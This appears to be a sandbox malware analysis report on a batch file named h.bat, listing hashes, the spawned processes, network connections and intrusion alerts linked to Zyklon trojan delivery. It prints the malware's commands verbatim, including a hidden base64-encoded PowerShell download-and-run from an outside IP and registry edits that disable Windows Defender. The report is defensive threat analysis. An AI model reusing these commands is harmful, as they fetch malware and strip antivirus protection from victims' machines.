File name: | h.bat |
Full analysis: | https://app.any.run/tasks/7fd829ab-c614-46a3-9e73-e91c390fc3f9 |
Verdict: | Malicious activity |
Analysis date: | January 11, 2019, 03:46:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with no line terminators |
MD5: | 156F4C32233C5450A4229691A403C44C |
SHA1: | D4EE2FFC41F2644F26730016361AAD230AD990A0 |
SHA256: | 8890411751F645885A6AC991EF4127D2C7ECE716F3965302C8F39A7B4AD82AAE |
SSDEEP: | 6:pLXQ9nyLZy2hCnJkd31iSFk2OCYFnNZfGEOlaMQxNVTaCZm90Xma4:lA9nazUnSFiSYFnCdsNMCZm9wmX |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2764 | cmd /c ""C:\Users\admin\AppData\Local\Temp\h.bat" " | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3692 | cmd.exe /c powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3908 | powershell.exe -nop -noni -w hidden -enc SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADgANQAuADIAMwA0AC4AMgAxADcALgAxADMAOQAvAHYAZQByAGMAaABlAGMAawAuAHAAcwAxACcAKQApAAoA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2976 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3376 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3756 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1248 | "C:\Windows\system32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f | C:\Windows\system32\reg.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Registry Console Tool Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9K6HGAKFJ0OFIV12GNTY.temp | — | |
MD5:— | SHA256:— | |||
3908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1992b1.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3908 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3908 | powershell.exe | GET | — | 111.90.145.52:443 | http://update.7h4uk.com:443/antitrojan.ps1 | MY | — | — | malicious |
3908 | powershell.exe | GET | 200 | 185.234.217.139:80 | http://185.234.217.139/vercheck.ps1 | unknown | text | 10.5 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3908 | powershell.exe | 111.90.145.52:443 | update.7h4uk.com | Shinjiru Technology Sdn Bhd | MY | malicious |
3908 | powershell.exe | 185.234.217.139:80 | — | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
update.7h4uk.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3908 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Powershell downloading stage during Zyklon delivery |
3908 | powershell.exe | A Network Trojan was detected | MINER [PTsecurity] ThreatMiner Powershell obfuscation script possible |
3908 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious behavior - PowerShell script downloading from non-standard port |